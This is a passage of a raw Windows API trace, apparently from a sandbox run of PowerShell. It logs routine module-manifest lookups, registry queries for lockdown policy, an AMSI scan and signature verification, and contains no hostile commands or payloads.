lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81e330, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0267.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e7b0) returned 1 [0267.118] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x259b268 | out: lpFileInformation=0x259b268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0267.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e770) returned 1 [0267.118] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b81e260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0267.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e6a0) returned 1 [0267.119] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b81e780 | out: lpFileInformation=0x1b81e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0267.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e660) returned 1 [0267.119] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", lpFilePart=0x0) returned 0x93 [0267.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e5e0) returned 1 [0267.119] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da21122d-ae44-4f93-ba1d-c9a978ca5b20"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x684 [0267.119] GetFileType (hFile=0x684) returned 0x1 [0267.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e550) returned 1 [0267.119] GetFileType (hFile=0x684) returned 0x1 [0267.124] ReadFile (in: hFile=0x684, lpBuffer=0x259f4b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e448, lpOverlapped=0x0 | out: lpBuffer=0x259f4b0*, lpNumberOfBytesRead=0x1b81e448*=0x1000, lpOverlapped=0x0) returned 1 [0267.927] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81cca8 | out: phkResult=0x1b81cca8*=0x0) returned 0x2 [0267.927] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81cca8 | out: phkResult=0x1b81cca8*=0x0) returned 0x2 [0268.105] ReadFile (in: hFile=0x684, lpBuffer=0x259f4b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e118, lpOverlapped=0x0 | out: lpBuffer=0x259f4b0*, lpNumberOfBytesRead=0x1b81e118*=0x1000, lpOverlapped=0x0) returned 1 [0268.106] ReadFile (in: hFile=0x684, lpBuffer=0x259f4b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81dd78, lpOverlapped=0x0 | out: lpBuffer=0x259f4b0*, lpNumberOfBytesRead=0x1b81dd78*=0xb02, lpOverlapped=0x0) returned 1 [0268.109] ReadFile (in: hFile=0x684, lpBuffer=0x259f4b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e418, lpOverlapped=0x0 | out: lpBuffer=0x259f4b0*, lpNumberOfBytesRead=0x1b81e418*=0x0, lpOverlapped=0x0) returned 1 [0268.109] CloseHandle (hObject=0x684) returned 1 [0268.110] ReleaseMutex (hMutex=0x564) returned 1 [0268.113] CoCreateGuid (in: pguid=0x1b81e878 | out: pguid=0x1b81e878*(Data1=0x1ae9d920, Data2=0x6acf, Data3=0x4c26, Data4=([0]=0xb0, [1]=0xc3, [2]=0x29, [3]=0x5e, [4]=0x7c, [5]=0x31, [6]=0x7c, [7]=0x2c))) returned 0x0 [0268.166] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x684 [0268.166] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6b4 [0268.166] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6b8 [0268.166] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6bc [0268.166] SetEvent (hEvent=0x6bc) returned 1 [0268.166] SetEvent (hEvent=0x684) returned 1 [0268.167] SetEvent (hEvent=0x6b4) returned 1 [0268.167] SetEvent (hEvent=0x6b8) returned 1 [0268.167] AmsiCloseSession () returned 0x7ffb1cb78068 [0268.168] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c0 [0268.168] SetThreadUILanguage (LangId=0x0) returned 0x409 [0268.243] EtwEventActivityIdControl () returned 0x0 [0268.243] EtwEventActivityIdControl () returned 0x0 [0268.243] EtwEventActivityIdControl () returned 0x0 [0268.947] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0268.948] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81db20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0268.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81df60) returned 1 [0268.948] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b81e040 | out: lpFileInformation=0x1b81e040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0268.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81df20) returned 1 [0268.949] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0268.950] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81d680, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0268.950] CoTaskMemAlloc (cb=0x20c) returned 0x1a9d0440 [0268.950] GetSystemDirectoryW (in: lpBuffer=0x1a9d0440, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0268.950] CoTaskMemFree (pv=0x1a9d0440) [0268.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0268.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b81d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0268.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81d990) returned 1 [0268.950] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b81da70 | out: lpFileInformation=0x1b81da70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0268.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81d950) returned 1 [0268.951] WldpGetLockdownPolicy () returned 0x0 [0268.951] GetSystemInfo (in: lpSystemInfo=0x1b81dad0 | out: lpSystemInfo=0x1b81dad0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0268.951] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81d9d8 | out: phkResult=0x1b81d9d8*=0x6a0) returned 0x0 [0268.951] RegQueryValueExW (in: hKey=0x6a0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b81da28, lpData=0x0, lpcbData=0x1b81da20*=0x0 | out: lpType=0x1b81da28*=0x0, lpData=0x0, lpcbData=0x1b81da20*=0x0) returned 0x2 [0268.951] RegCloseKey (hKey=0x6a0) returned 0x0 [0268.958] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0268.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81d8a0) returned 1 [0268.958] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6a0 [0268.958] GetFileType (hFile=0x6a0) returned 0x1 [0268.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81d810) returned 1 [0268.958] GetFileType (hFile=0x6a0) returned 0x1 [0268.958] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81d858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81d858*=0) returned 0x0 [0268.958] ReadFile (in: hFile=0x6a0, lpBuffer=0x22d5e30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81d8d8, lpOverlapped=0x0 | out: lpBuffer=0x22d5e30*, lpNumberOfBytesRead=0x1b81d8d8*=0x950, lpOverlapped=0x0) returned 1 [0268.959] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81d858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81d858*=0) returned 0x950 [0268.959] ReadFile (in: hFile=0x6a0, lpBuffer=0x22d52e8, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x1b81d8d8, lpOverlapped=0x0 | out: lpBuffer=0x22d52e8*, lpNumberOfBytesRead=0x1b81d8d8*=0x0, lpOverlapped=0x0) returned 1 [0268.959] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b81d858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b81d858*=0) returned 0x950 [0268.959] ReadFile (in: hFile=0x6a0, lpBuffer=0x22d5e30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81d8d8, lpOverlapped=0x0 | out: lpBuffer=0x22d5e30*, lpNumberOfBytesRead=0x1b81d8d8*=0x0, lpOverlapped=0x0) returned 1 [0268.959] CoTaskMemAlloc (cb=0x20c) returned 0x1a9d0440 [0268.959] GetSystemDirectoryW (in: lpBuffer=0x1a9d0440, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0268.959] CoTaskMemFree (pv=0x1a9d0440) [0268.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0268.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b81d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0268.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81d7f0) returned 1 [0268.960] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b81d8d0 | out: lpFileInformation=0x1b81d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0268.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81d7b0) returned 1 [0268.960] WldpGetLockdownPolicy () returned 0x0 [0268.960] GetSystemInfo (in: lpSystemInfo=0x1b81d930 | out: lpSystemInfo=0x1b81d930*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0268.960] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81d838 | out: phkResult=0x1b81d838*=0x68c) returned 0x0 [0268.960] RegQueryValueExW (in: hKey=0x68c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b81d888, lpData=0x0, lpcbData=0x1b81d880*=0x0 | out: lpType=0x1b81d888*=0x0, lpData=0x0, lpcbData=0x1b81d880*=0x0) returned 0x2 [0268.960] RegCloseKey (hKey=0x68c) returned 0x0 [0268.960] CloseHandle (hObject=0x6a0) returned 1 [0268.989] CoCreateGuid (in: pguid=0x1b81d9e8 | out: pguid=0x1b81d9e8*(Data1=0x7c76fb55, Data2=0x9d0e, Data3=0x4750, Data4=([0]=0xa0, [1]=0x29, [2]=0x5b, [3]=0x5c, [4]=0xa9, [5]=0x5d, [6]=0xc, [7]=0xa2))) returned 0x0 [0268.994] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0268.996] AmsiOpenSession () returned 0x0 [0268.996] AmsiScanString () returned 0x80070015 [0269.018] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81d000, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.020] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81cf70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81d3b0) returned 1 [0269.020] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b81d490 | out: lpFileInformation=0x1b81d490*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0269.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81d370) returned 1 [0269.020] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81cf20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.020] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81cd80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.020] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81ce50, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81d290) returned 1 [0269.020] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b81d370 | out: lpFileInformation=0x1b81d370*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0269.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81d250) returned 1 [0269.021] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81cd40, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81d220) returned 1 [0269.021] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6a4 [0269.021] GetFileType (hFile=0x6a4) returned 0x1 [0269.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81d190) returned 1 [0269.021] GetFileType (hFile=0x6a4) returned 0x1 [0269.021] WTGetSignatureInfo () returned 0x0 [0269.089] CertDuplicateCertificateContext (pCertContext=0x1a94d160) returned 0x1a94d160 [0269.090] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81d2b8 | out: phkResult=0x1b81d2b8*=0x6c4) returned 0x0 [0269.090] RegQueryValueExW (in: hKey=0x6c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81d308, lpData=0x0, lpcbData=0x1b81d300*=0x0 | out: lpType=0x1b81d308*=0x1, lpData=0x0, lpcbData=0x1b81d300*=0x56) returned 0x0 [0269.090] RegQueryValueExW (in: hKey=0x6c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b81d308, lpData=0x2303020, lpcbData=0x1b81d300*=0x56 | out: lpType=0x1b81d308*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b81d300*=0x56) returned 0x0 [0269.090] RegCloseKey (hKey=0x6c4) returned 0x0 [0269.090] CoTaskMemAlloc (cb=0x10) returned 0x1a91a340 [0269.090] CoTaskMemAlloc (cb=0x50) returned 0x1a9d4e10 [0269.090] WinVerifyTrust () returned 0x0 [0269.091] CoTaskMemFree (pv=0x1a9d4e10) [0269.091] CoTaskMemFree (pv=0x1a91a340) [0269.112] CertFreeCertificateContext (pCertContext=0x1a94d160) returned 1 [0269.112] CloseHandle (hObject=0x6a4) returned 1 [0269.116] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81d570, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.116] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0269.116] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0269.235] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81c590, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.237] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.237] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81c550, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.238] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b81c560, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0269.288] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b81c590, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0269.312] GetFullPathNameW (in: 